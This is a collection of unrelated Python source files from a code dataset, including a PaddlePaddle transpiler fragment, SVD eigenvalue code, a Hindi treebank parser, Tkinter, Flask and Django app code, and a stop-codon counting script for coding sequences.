self.param_grad_map[endpoint][\"grads\"]\n ]\n for opt_op in optimize_ops:\n for _, var in opt_op.inputs.iteritems():\n # NOTE: append operators to merge gradients from multiple\n # trainers. If trainers == 1, this is not needed.\n if self.trainers > 1 and var.name in grad_var_names:\n vars2merge = self._create_var_for_trainers(\n optimize_sub_program.global_block(), var, self.trainers)\n merged_var = optimize_sub_program.global_block().create_var(\n name=var.name,\n persistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n optimize_sub_program.global_block().append_op(\n type=\"sum\",\n inputs={\"X\": vars2merge},\n outputs={\"Out\": merged_var})\n optimize_sub_program.global_block().append_op(\n type=\"scale\",\n inputs={\"X\": merged_var},\n outputs={\"Out\": merged_var},\n attrs={\"scale\": 1.0 / float(self.trainers)})\n else:\n optimize_sub_program.global_block().create_var(\n name=var.name,\n persistable=var.persistable,\n dtype=var.dtype,\n shape=var.shape)\n\n if opt_op.inputs.has_key(\"Grad\"):\n if opt_op.inputs[\"Grad\"].name in grad_var_names:\n optimize_sub_program.global_block().append_op(\n type=opt_op.type,\n inputs=opt_op.inputs,\n outputs=opt_op.outputs,\n attrs=opt_op.attrs)\n else:\n optimize_sub_program.global_block().append_op(\n type=opt_op.type,\n inputs=opt_op.inputs,\n outputs=opt_op.outputs,\n attrs=opt_op.attrs)\n pserver_program.global_block().append_op(\n type=\"recv\",\n inputs={\"RX\":\n self.param_grad_map[endpoint][\"grads\"]}, # grads to recv\n outputs={},\n attrs={\n \"OptimizeBlock\": optimize_sub_program.global_block(),\n \"endpoint\": endpoint,\n \"ParamList\":\n [p.name for p in self.param_grad_map[endpoint][\"params\"]],\n \"GradList\":\n [p.name for p in self.param_grad_map[endpoint][\"grads\"]],\n \"Trainers\": self.trainers\n })\n pserver_program.sync_with_cpp()\n return pserver_program\n","sub_path":"python/paddle/v2/fluid/distribute_transpiler_simple.py","file_name":"distribute_transpiler_simple.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517325988","text":"import numpy as np\r\nimport time\r\nimport scipy as sp\r\nimport scipy.linalg\r\nfrom scipy import sparse\r\nimport scipy.sparse.linalg\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport warnings\r\n\r\n\r\ndef prep_data():\r\n x = np.loadtxt(\"simulated_genos\", delimiter=\" \", dtype=\"float32\")\r\n y = np.array([[1] * 10000 + [0] * 10000], dtype=\"float32\")\r\n y_c = y - 0.5\r\n return x, y, y_c\r\n\r\n#############################################\r\n#IRLB\r\n\r\n\r\ndef mult(A,x,t=False):\r\n if(sparse.issparse(A)):\r\n m = A.shape[0]\r\n n = A.shape[1]\r\n if(t):\r\n return(sparse.csr_matrix(x).dot(A).transpose().todense().A[:,0])\r\n return(A.dot(sparse.csr_matrix(x).transpose()).todense().A[:,0])\r\n if(t):\r\n return(x.dot(A))\r\n return(A.dot(x))\r\n\r\ndef orthog(Y,X):\r\n dotY = mult(X,Y,t=True)\r\n return (Y - mult(X,dotY))\r\n\r\n\r\ndef invcheck(x):\r\n eps2 = 2*np.finfo(np.float).eps\r\n if(x>eps2):\r\n x = 1/x\r\n else:\r\n x = 0\r\n return(x)\r\n\r\ndef irlb(A,n,tol=0.0001,maxit=50):\r\n nu = n\r\n m = A.shape[0]\r\n n = A.shape[1]\r\n m_b = min((nu+20, 3*nu, n))\r\n mprod = 0\r\n it = 0\r\n j = 0\r\n k = nu\r\n smax = 1\r\n ifsparse = sparse.issparse(A)\r\n\r\n V = np.zeros((n,m_b))\r\n W = np.zeros((m,m_b))\r\n F = np.zeros((n,1))\r\n B = np.zeros((m_b,m_b))\r\n\r\n V[:,0] = np.random.randn(n)\r\n V[:,0] = V[:,0]/np.linalg.norm(V)\r\n\r\n 
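    # Outer loop of the implicitly restarted Lanczos bidiagonalization: each
    # sweep extends the bases V (right vectors) and W (left vectors) and the
    # small projected matrix B, then restarts from the k (= nu) leading
    # singular triplets until the residuals drop below tol or maxit is reached.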
while(it < maxit):\r\n if(it>0): j=k\r\n W[:,j] = mult(A,V[:,j])\r\n mprod+=1\r\n if(it>0):\r\n W[:,j] = orthog(W[:,j],W[:,0:j]) # NB W[:,0:j] selects columns 0,1,...,j-1\r\n s = np.linalg.norm(W[:,j])\r\n sinv = invcheck(s)\r\n W[:,j] = sinv*W[:,j]\r\n while(j num]\r\n return i_arr[0] / len(arr) if len(i_arr) > 0 else 1\r\n\r\n\r\ndef p_cal(Q_distribution, q=223.25):\r\n abs_Q_distribution = abs(Q_distribution - np.average(Q_distribution))\r\n q_abs = abs(q - np.average(Q_distribution))\r\n p = 1 - inverse_percentile(abs_Q_distribution, q_abs)\r\n return p\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Specify file path here. Default is current working directory.\r\n x, y, y_c = prep_data()\r\n q = 223.25\r\n n = 20000\r\n X = x[:, :]\r\n n = X.shape[0]\r\n p = X.shape[1]\r\n X_sparse = sp.sparse.csr_matrix(X)\r\n\r\n # IRLB: This is the first implementation. Slow.\r\n eig_irlb = irlb(X, 50)[1] ** 2\r\n\r\n # RSVD: This is the second implementation. Fast.\r\n # If need to test speed, use this one.\r\n start_time = time.clock()\r\n eig_rsvd = randomized_svd(x, 50)[1] ** 2\r\n end_time = time.clock()\r\n print(\"The time of RSVD is: \", end_time - start_time)\r\n\r\n # Calculate p-value\r\n Q_distribution_1 = generate_Q(eig=eig_irlb)\r\n print(\"The p-value of IRLB is:\", p_cal(Q_distribution_1, q))\r\n Q_distribution_2 = generate_Q(eig=eig_rsvd)\r\n print(\"The p-value of RSVD is:\", p_cal(Q_distribution_2, q))","sub_path":"BST234_Project_Code/Eigenvalue.py","file_name":"Eigenvalue.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401043719","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\n\n\ndef interpolD1D(m, c):\n \"\"\"Computes a m+2 by m+1 one-dimensional interpolator of 2nd-order\n\n Arguments:\n m (int): Number of cells\n c (float): Left interpolation coeff.\n\n Returns:\n :obj:`ndarray` containing coefficients of interpolator\n \"\"\"\n\n assert m >= 4, \"m must be >= 4, given: {}\".format(m)\n assert (c >= 0) and (c <= 1), \"0 <= c <= 1, given: {}\".format(c)\n\n \"\"\"\n Dimensions of I\n \"\"\"\n n_rows = m + 2\n n_cols = m + 1\n\n I = csr_matrix((n_rows, n_cols), dtype=np.float)\n\n I[0, 0] = 1.\n I[-1, -1] = 1.\n\n \"\"\"\n Average between two continuous cells\n \"\"\"\n avg = np.array([c, 1.-c], dtype=np.float)\n\n j = 0\n for i in range(1, n_cols):\n I[i, j:j+2] = avg\n j = j + 1\n\n return I\n\n\nif __name__ == '__main__':\n print(interpolD1D(5, 0.5))\n","sub_path":"core/interpolD1D.py","file_name":"interpolD1D.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"638963051","text":"import os\nimport re\nimport pickle \n\npath = \"/home/saurav/Documents/hindi_morph_analysis/HDTB_pre_release_version-0.05/IntraChunk/CoNLL/utf/news_articles_and_heritage/Testing/\"\n\ncnt = 0\nsentences = []\nrootwords = []\nfeatures = []\nn_files = 0\n\n# sentences = pickle.load(open('sentences_intra', 'rb'))\n# rootwords = pickle.load(open('rootwords_intra', 'rb'))\n# features = pickle.load(open('features_intra', 'rb'))\n\nfor filename in os.listdir(path):\n\tn_files += 1\n\twith open(os.path.join(path, filename)) as fn:\n\t\t\n\t\twords = []\n\t\troots = []\n\t\ttags = []\n\t\tfor line in fn:\n\t\t\tline = line.rstrip()\t\n\t\t\t# import pdb\n\t\t\t# pdb.set_trace()\n\t\t\tif(line): # keep adding words till blank line\n\t\t\t\tlis = re.split(r'\\t+', 
line.rstrip('\\t'))\n\t\t\t\n\t\t\t\tif cnt == 5:\n\t\t\t\t\tprint(words)\n\t\t\t\tif lis[1] == 'NULL' or lis[2] == 'null' or lis[1]== '' or lis[2] == '':\n\t\t\t\t\tcontinue \n\t\t\t\twords.insert(len(words),lis[1])\n\t\t\t\troots.insert(len(roots), lis[2])\n\t\t\t\ttags.insert(len(tags), lis[5])\n\t\t\t\tcontinue\n\n\t\t\telse: # encounter a blank line; add all previous words to form a sentence\n\t\t\t\t\n\t\t\t\t# clear() deletes the references to the lists\n\t\t\t\t# so make copy of lists \n\t\t\t\ttempwords = []\n\t\t\t\ttemproots = []\n\t\t\t\ttemptags = []\n\t\t\t\tfor i in range(len(words)):\n\t\t\t\t\ttempwords.append(words[i])\n\t\t\t\t\ttemproots.append(roots[i])\n\t\t\t\t\ttemptags.append(tags[i])\n\n\t\t\t\tsentences.append(tempwords)\n\t\t\t\trootwords.append(temproots)\n\t\t\t\tfeatures.append(temptags)\n\t\t\t\n\t\t\t\tcnt += 1\n\t\t\t\twords.clear()\n\t\t\t\troots.clear()\n\t\t\t\ttags.clear()\n\nprint(\"total files: \", n_files)\nprint(cnt)\nprint(\"total sentences: \", len(sentences))\nprint(len(rootwords))\nprint(len(features))\n\nprint(len([i for item in rootwords for i in item]))\n\npickle.dump(sentences, open('sentences_test', 'wb'))\npickle.dump(rootwords, open('rootwords_test', 'wb'))\npickle.dump(features, open('features_test', 'wb'))\n\n'''\n######## calculate stats #########\n\n# mean sentence len\nslen = 0\nfor s in sentences:\n\t#print(s)\n\tslen += len(s)\nprint(\"Mean len: \", slen/len(sentences))\n\n# no of unique words\nall_words = [item for sentence in sentences for item in sentence]\nprint(\"Total words: \", len(all_words))\nwords_set = set(all_words)\nprint(\"Unique words: \", len(words_set))\n'''\n\n\n","sub_path":"urdu/preProcessing/parse_data_test.py","file_name":"parse_data_test.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"638449198","text":"# Not Ready Yet Frame Script\n\n# This script represents the frame to be displayed when\n# a part of the frame is still in development and hasn't been\n# completed yet.\n\n\n#IMPORTS\nfrom tkinter import Frame\nfrom tkinter import font\nimport Main_Frame #This one does not cause a \"Circular Import Error\"\nimport cGUIf, os\n\n#GLOBAL CONSTANTS\nFONTS = {\n \"lucida grande\" : \"Lucida Grande\",\n \"cambria\" : \"Cambria\",\n \"times new roman\" : \"Times New Roman\"\n }\n\nICON_FOLDER = \"pics\"\n\nICON_NAMES = (\"neutral_face\",\"bananinsin\",\"back_arrow\")\n\nICON_PATHS = (os.path.join(ICON_FOLDER,\"icon_neutral_face.png\"),\n os.path.join(ICON_FOLDER,\"icon_JR016.png\"),\n os.path.join(ICON_FOLDER,\"icon_left_arrow.png\"))\n\n\n#Not Ready Yet Frame/Page class\nclass Not_Ready_Yet_Frame(Frame):\n \"\"\"Frame to display when something is not ready yet..\"\"\"\n\n def __init__(self,master,width,height):\n \"\"\"Initialize this frame with all the required information.\"\"\"\n\n #Save inherited arguments\n self.master = master\n self.width = width\n self.height = height\n\n #Call parent's constructor method\n super(Not_Ready_Yet_Frame,self).__init__(master,\n width = width,\n height = height)\n\n #Dict of images\n self.__pics = self.pics_dict\n\n #Add the UI elements to the frame\n self.build_UI()\n\n @property\n def pics_dict(self):\n \"\"\"Dictionary that contains the images of this frame.\"\"\"\n\n #Add a for loop when the images of this frame are more than 3\n\n img_dict = {}\n \n neutral_pic = cGUIf.get_TkImage(ICON_PATHS[0],128,128)\n banana_pic = cGUIf.get_TkImage(ICON_PATHS[1],100,100)\n arrow_pic = 
cGUIf.get_TkImage(ICON_PATHS[2],32,32)\n \n img_dict.update({ICON_NAMES[0] : neutral_pic,\n ICON_NAMES[1] : banana_pic,\n ICON_NAMES[2] : arrow_pic})\n\n return img_dict\n\n def switch_frames(self):\n \"\"\"Switch back to the Main Frame.\"\"\"\n\n #Create new frame\n\n mainFrame = Main_Frame.Main_Frame(self.master,\n self.width,\n self.height)\n mainFrame.place(x = 0, y = 0)\n\n #Destroy this frame\n self.place_forget()\n self.destroy()\n \n\n def build_UI(self):\n \"\"\"Contains the UI widgets of this frame.\"\"\"\n\n #Common local coordinates to change the UI positions\n common_x = 0\n common_y = 0\n\n #Tell the user this frame is not ready to use yet\n\n #Create a big \"Sorry\" label\n self.sorryFont = font.Font(family = FONTS[\"lucida grande\"], size = 35)\n self.sorryLabel = cGUIf.get_TextLabel(self,\n \"Sorry\",\n self.sorryFont,\n 250 + common_x,\n 30 + common_y)\n \n\n #Create a label to hold the indifferent face\n self.neutralFaceIcon = cGUIf.get_ImgLabel(self,\n self.__pics[\"neutral_face\"],\n 243 + common_x,\n 110 + common_y)\n\n #Create explanatory labels that says what's going on\n self.explanationFont = font.Font(family = FONTS[\"times new roman\"], size = 15)\n self.explanationLabel1 = cGUIf.get_TextLabel(self,\n \"This part of the FCA has not been developed yet\",\n self.explanationFont,\n 120 + common_x,\n 270 + common_y)\n\n self.explanationLabel2 = cGUIf.get_TextLabel(self,\n \"JR016 is busy doing other things (Most of them irrevelant)\",\n self.explanationFont,\n 80 + common_x,\n 310 + common_y)\n\n self.explanationLabel3 = cGUIf.get_TextLabel(self,\n \"Please wait until this part of the FCA is ready\",\n self.explanationFont,\n 130 + common_x,\n 350 + common_y)\n\n self.explanationLabel4 = cGUIf.get_TextLabel(self,\n \"JR016 appreciates your patience\",\n self.explanationFont,\n 180 + common_x,\n 390 + common_y)\n\n #Add the JR016 Github icon\n self.bananinsinIcon = cGUIf.get_ImgLabel(self,\n self.__pics[\"bananinsin\"],\n 255 + common_x,\n 420 + common_y)\n \n\n #Add a label that says \"Back\" for the back button\n self.backFont = font.Font(family = FONTS[\"cambria\"],size = 12)\n self.backLabel = cGUIf.get_TextLabel(self,\n \"Back\",\n self.backFont,\n 80 + common_x,\n 489 + common_y)\n\n #Add a back button to go back to the main Frame\n self.backButton = cGUIf.get_Button(self,\n \"\",\n self.switch_frames,\n 30 + common_x,\n 480 + common_y)\n \n self.backButton.configure(image = self.__pics[\"back_arrow\"])\n\n \n\n \n \n \n\n \n\ndef main(): \n \"\"\"Run warning if run directly\"\"\"\n\n warning_message = \"This script contains the code that builds the \" \\\n + \"Doc page of the FCA (File Converter App).\" \\\n + \"\\n\\nThis script should NOT be run DIRECTLY.\" \\\n + \"\\n\\nPlease, import it in another script.\"\n\n cGUIf.show_warning(\"Import warning\",warning_message)\n\n\n\n\nif __name__ == \"__main__\": \n main()\n","sub_path":"notReadyYetFrame.py","file_name":"notReadyYetFrame.py","file_ext":"py","file_size_in_byte":6769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188162223","text":"from flask import Flask, render_template, request, redirect, session\nimport random\nimport datetime \napp = Flask(__name__)\napp.secret_key = 'gold' # set a secret key for security purposes\n\n\n\n@app.route('/')\ndef home() :\n break_html = \"
\"\n if 'gold' in session:\n y = \"yo\"\n else :\n session['activities'] = \"\"\n session['gold'] = 0\n print (session)\n return render_template('index.html', break_h=break_html)\n\n@app.route('/process_money', methods=['POST'])\ndef process() :\n print (request.form)\n date_time = datetime.datetime.now()\n date_time_str = date_time.strftime(\"%b %d %Y %H:%M:%S\")\n if request.form['location'] == \"farm\" :\n amount = random.randint(10,20)\n session['gold'] += int(amount)\n print(\"Gold found at the farm\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the farm! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"cave\" :\n amount = random.randint(5, 10)\n session['gold'] += int(amount)\n print(\"Gold found at the cave\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the cave! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"house\" :\n amount = random.randint(2, 5)\n session['gold'] += int(amount)\n print(\"Gold found at the house\")\n session['activities'] = \"
Earned \"+str(amount)+\" gold at the house! (\"+date_time_str+\")
\"+session['activities']\n elif request.form['location'] == \"casino\" :\n amount = random.randint(-50, 50)\n session['gold'] += int(amount)\n print(\"Gold found at the casino\")\n if amount >= 0 :\n session['activities'] = \"
Entered a Casino and won \"+str(amount)+\" gold.... Awesome! (\"+date_time_str+\")
\"+session['activities']\n else :\n session['activities'] = \"
Entered a Casino and lost \"+str(amount)+\" gold.... Ouch! (\"+date_time_str+\")
\"+session['activities']\n return redirect('/')\n\n@app.route('/reset', methods=['POST']) \ndef reset() :\n session.clear()\n return redirect('/')\n\nif __name__ == \"__main__\" :\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15392984","text":"from django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import CreateView, TemplateView\n\nfrom core.core import get_client_ip, update_stats\nfrom core.decorators import check_recaptcha\nfrom core.forms import ContactUsMessageForm\nfrom posts.models import EventPost, Post, ShowreelPost\n\n\nclass IndexView(TemplateView):\n template_name = 'core/home.html'\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='Home')\n return super().get(request, *args, **kwargs)\n \n def get_context_data(self, **kwargs):\n # define contenxt data for the homepage\n context = super().get_context_data(**kwargs)\n context['events'] = EventPost.objects.filter(published=True).order_by('-date', '-time')[:4]\n context['posts'] = Post.objects.filter(published=True)\n context['published_showreel_posts'] = ShowreelPost.objects.filter(published=True)\\\n .order_by('-created')[:6]\n return context\n \n\nclass AboutUsView(TemplateView):\n template_name = 'core/about_us.html'\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='About Us')\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['team'] = User.objects.filter(is_staff=True)\n return context\n \n\nclass ContactUsView(CreateView):\n form_class = ContactUsMessageForm\n template_name = 'core/contact_us.html'\n success_url = reverse_lazy('beta_contact_us')\n\n def get(self, request, *args, **kwargs):\n # update page and click statistics\n update_stats(request, page='Contact Us')\n return super().get(request, *args, **kwargs)\n\n def form_valid(self, form):\n form.instance.ip = get_client_ip(self.request)\n messages.success(\n self.request, \n 'Thank you for your message %s! We will get back to you.' 
% form.instance.name)\n return super().form_valid(form)\n\n @method_decorator(check_recaptcha)\n def post(self, request, *args, **kwargs):\n return super().post(request, *args, **kwargs)\n","sub_path":"musikemedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289577761","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2016 Ryan Fan\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE\nOR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nimport sys\nimport socket\nimport fcntl\nimport struct\nimport array\nimport ConfigParser\nimport ast\n\nclass MiscUtils:\n @staticmethod\n def encode(msg, stream):\n if isinstance(msg, unicode) and hasattr(stream, 'encoding') and not stream.encoding is None:\n return msg.encode(stream.encoding)\n else:\n return str(msg)\n\n @staticmethod\n def abort(msg):\n \"\"\"\n Abort execution, print ``msg`` to stderr and exit with error status (1.)\n\n This function currently makes use of `SystemExit`_ in a manner that is\n similar to `sys.exit`_ (but which skips the automatic printing to stderr,\n allowing us to more tightly control it via settings).\n\n Therefore, it's possible to detect and recover from inner calls to `abort`\n by using ``except SystemExit`` or similar.\n\n .. _sys.exit: http://docs.python.org/library/sys.html#sys.exit\n .. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit\n \"\"\"\n sys.stderr.write(\"\\nFatal error: %s\\n\" % MiscUtils.encode(msg, sys.stderr))\n sys.stderr.write(\"\\nAborting.\\n\")\n\n # See issue #1318 for details on the below; it lets us construct a\n # valid, useful SystemExit while sidestepping the automatic stderr\n # print (which would otherwise duplicate with the above in a\n # non-controllable fashion).\n e = SystemExit(1)\n e.message = msg\n raise e\n\n @staticmethod\n def import_module(name, package=None):\n \"\"\"Import a module.\n\n The 'package' argument is required when performing a relative import. 
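        For example, import_module('.utils', package='mypkg') (with 'mypkg' as an illustrative package name) resolves the relative name to 'mypkg.utils' and imports it.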
It\n specifies the package to use as the anchor point from which to resolve the\n relative import to an absolute import.\n\n \"\"\"\n def _resolve_name(name, package, level):\n \"\"\"Return the absolute name of the module to be imported.\"\"\"\n if not hasattr(package, 'rindex'):\n raise ValueError(\"'package' not set to a string\")\n dot = len(package)\n for x in xrange(level, 1, -1):\n try:\n dot = package.rindex('.', 0, dot)\n except ValueError:\n raise ValueError(\"attempted relative import beyond top-level \"\n \"package\")\n return \"%s.%s\" % (package[:dot], name)\n\n if name.startswith('.'):\n if not package:\n raise TypeError(\"relative imports require the 'package' argument\")\n level = 0\n for character in name:\n if character != '.':\n break\n level += 1\n name = _resolve_name(name[level:], package, level)\n __import__(name)\n return sys.modules[name]\n\n @staticmethod\n def load_class(module_path, class_name):\n try:\n mod = MiscUtils.import_module(module_path)\n cls = getattr(mod, class_name)\n except ImportError:\n raise ValueError(\"Module '%s' could not be imported\" % (module_path,))\n\n return cls\n\n @staticmethod\n def load_module(module_path):\n try:\n mod = MiscUtils.import_module(module_path)\n except ImportError:\n raise ValueError(\"Error: Module '%s' could not be imported\" % (module_path,))\n\n return mod\n\nclass _AttributeDict(dict):\n \"\"\"\n Dictionary subclass enabling attribute lookup/assignment of keys/values.\n\n For example::\n\n >>> m = _AttributeDict({'foo': 'bar'})\n >>> m.foo\n 'bar'\n >>> m.foo = 'not bar'\n >>> m['foo']\n 'not bar'\n\n ``_AttributeDict`` objects also provide ``.first()`` which acts like\n ``.get()`` but accepts multiple keys as arguments, and returns the value of\n the first hit, e.g.::\n\n >>> m = _AttributeDict({'foo': 'bar', 'biz': 'baz'})\n >>> m.first('wrong', 'incorrect', 'foo', 'biz')\n 'bar'\n\n \"\"\"\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n # to conform with __getattr__ spec\n raise AttributeError(key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def first(self, *names):\n for name in names:\n value = self.get(name)\n if value:\n return value\n\n\nclass NetUtils(object):\n @staticmethod\n def get_all_interfaces():\n def format_ip(addr):\n return str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))\n\n max_possible = 128 # arbitrary. 
raise if needed.\n bytes = max_possible * 32\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n names = array.array('B', '\\0' * bytes)\n outbytes = struct.unpack('iL', fcntl.ioctl(\n s.fileno(),\n 0x8912, # SIOCGIFCONF\n struct.pack('iL', bytes, names.buffer_info()[0])\n ))[0]\n namestr = names.tostring()\n lst = []\n for i in range(0, outbytes, 40):\n name = namestr[i:i+16].split('\\0', 1)[0]\n addr = namestr[i+20:i+24]\n ip = format_ip(addr)\n lst.append((name, ip))\n\n return lst\n\n @staticmethod\n def get_all_ips():\n ifs = NetUtils.get_all_interfaces()\n ip_list = [ ip for name, ip in ifs ]\n return ip_list\n\n @staticmethod\n def is_local_mode(host):\n ip = socket.gethostbyname(host)\n ip_list = NetUtils.get_all_ips()\n # if we find the ip hostname resolved is configured in localhost\n # then we think it should run locally\n if ip in ip_list:\n return True\n\n return False\n\nclass ConfigUtils(object):\n @staticmethod\n def read_file(conf_file):\n config = ConfigParser.ConfigParser()\n if not config.read(conf_file):\n return None\n\n return config\n\n @staticmethod\n def get_options(config, section):\n options = {}\n for option_name in config.options(section):\n options[option_name] = config.get(section, option_name)\n\n return _AttributeDict(options)\n\n @staticmethod\n def get_option_value(config, section, option, default=None):\n \"\"\"\n Try to get ini file->section->option->value by ConfigParser.get(section, option_name),\n If failed to find the correspoding option name, then it will try what calculated by default()\n e,g:\n For get_option_value(config, 'SERVICE_NGINX', '__type__', default= lambda x:x[:6]),\n if no '__type__' option defined in section 'SERVICE_NGINX',\n if will try default('SERVICE_NGINX') to calcute the option name\n\n :return:\n \"\"\"\n value = None\n try:\n value = config.get(section, option)\n except ConfigParser.NoOptionError:\n value = default\n if callable(default):\n value = default(section)\n\n return value\n\n @staticmethod\n def section_startswith(section, prefix):\n \"\"\"\n Check if section starts with prefix or not\n\n :param section:\n :param prefix:\n :return:\n \"\"\"\n valid_prefixs = (prefix.upper(), prefix.lower())\n if section[:len(prefix)] in valid_prefixs:\n return True\n\n return False\n","sub_path":"nihility/nihility/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642997415","text":"\nfrom database import *\nfrom settings import *\n\ndef search(request):\n\n query = request.query_string.get(\"query\", [\"\"])[0]\n\n q = database.execute(\"\"\"\n\n SELECT DISTINCT * FROM comments\n LEFT OUTER JOIN\n threads ON\n threads.thread_id = comments.thread_id\n LEFT OUTER JOIN\n users ON\n users.user_id = threads.op_id\n WHERE body LIKE ?\n\n \"\"\", (r\"%\" + str(query) + r\"%\",)).fetchall()\n\n content = \"\"\n if query:\n for result in q:\n content += templates[\"thread_link\"].format(\n thread_id=result[\"thread_id\"],\n title=result[\"title\"],\n username=result[\"username\"],\n timestamp=result[\"timestamp\"])\n\n if content:\n page = templates[\"search\"].format(results=content)\n elif query:\n page = templates[\"search\"].format(results=\"No results found\")\n else:\n page = templates[\"search\"].format(results=\"\")\n\n return request.default_response(page)\n\ndef search_post(request):\n query = request.options.get(\"query\", [\"\"])[0]\n \n return 
request.redirect_response(\"/search.html?query=\"+str(query))\n","sub_path":"backend/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477790022","text":"import glob\r\nimport csv\r\n\r\nwith open('AnalyzedCDS.csv','w'): # This part empties Analyzed.csv if it exists\r\n pass\r\n\r\nwith open('AnalyzedCDS.csv', 'w', newline='') as csvfile: #This will first write the complet header\r\n writer = csv.writer(csvfile)\r\n Name = (\"provided by Gürkan Korkmaz\", \"http://orcid.org/0000-0003-1911-027X\")\r\n header = (\"Sequence\", \"TotalCDS\", \"Uncounted\", \"%Uncounted\", \"TGA\", \"TAG\", \"TAA\", \"%TGA\", \"%TAG\", \"%TAA\", \"CDSGC\", \"OffTGA\", \"OffTAG\", \"OffTAA\", \"%OffTGA\", \"%OffTAG\", \"%OffTAA\", 'CDS Gs', 'CDS Cs', 'CDS As', 'CDS Ts', )\r\n writer.writerow(Name)\r\n writer.writerow(header)\r\n#This will print out all files loaded in the same directory\r\nfor filename in glob.glob('*.fna*'):\r\n print(filename)\r\n#Total Number of Coding Sequences\r\n substringCDS = \">\"\r\n Total = (open(filename, 'r').read().count(substringCDS))\r\n#Canonical Stop Codons\r\n substringcanonicalTGA = \"TGA\\n>\"\r\n TGA = (open(filename, 'r').read().count(substringcanonicalTGA))\r\n substringcanonicalTAG = \"TAG\\n>\"\r\n TAG = (open(filename, 'r').read().count(substringcanonicalTAG))\r\n substringcanonicalTAA = \"TAA\\n>\"\r\n TAA = (open(filename, 'r').read().count(substringcanonicalTAA))\r\n RatioTGA = 1 + TGA / (1 + TGA + TAG + TAA)\r\n RatioTAG = 1 + TAG / (1 + TGA + TAG + TAA)\r\n RatioTAA = 1 + TAA / (1 + TGA + TAG + TAA)\r\n#Uncounted Stops\r\n Uncounted = Total - (TGA + TAG +TAA)\r\n RatioUncounted = Uncounted / Total\r\n#GC content\r\n substringcanonicalCDSG = \"G\"\r\n CDSG = (open(filename, 'r').read().count(substringcanonicalCDSG))\r\n substringcanonicalCDSC = \"C\"\r\n CDSC = (open(filename, 'r').read().count(substringcanonicalCDSC))\r\n substringcanonicalCDSA = \"A\"\r\n CDSA = (open(filename, 'r').read().count(substringcanonicalCDSA))\r\n substringcanonicalCDST = \"T\"\r\n CDST = (open(filename, 'r').read().count(substringcanonicalCDST))\r\n GC = (CDSG+CDSC)/(CDSA+CDSC+CDSG+CDST)\r\n#OffFrameTGA\r\n substringOffTGA1 = \"TGA\"\r\n OffTGA1 = (open(filename, 'r').read().count(substringOffTGA1))\r\n substringOffTGA2 = \"TG\\nA\"\r\n OffTGA2 = (open(filename, 'r').read().count(substringOffTGA2))\r\n substringOffTGA3 = \"T\\nGA\"\r\n OffTGA3 = (open(filename, 'r').read().count(substringOffTGA3))\r\n OffTGA = OffTGA1 + OffTGA2 + OffTGA3\r\n#OffFrameTAG\r\n substringOffTAG1 = \"TAG\"\r\n OffTAG1 = (open(filename, 'r').read().count(substringOffTAG1))\r\n substringOffTAG2 = \"TA\\nG\"\r\n OffTAG2 = (open(filename, 'r').read().count(substringOffTAG2))\r\n substringOffTAG3 = 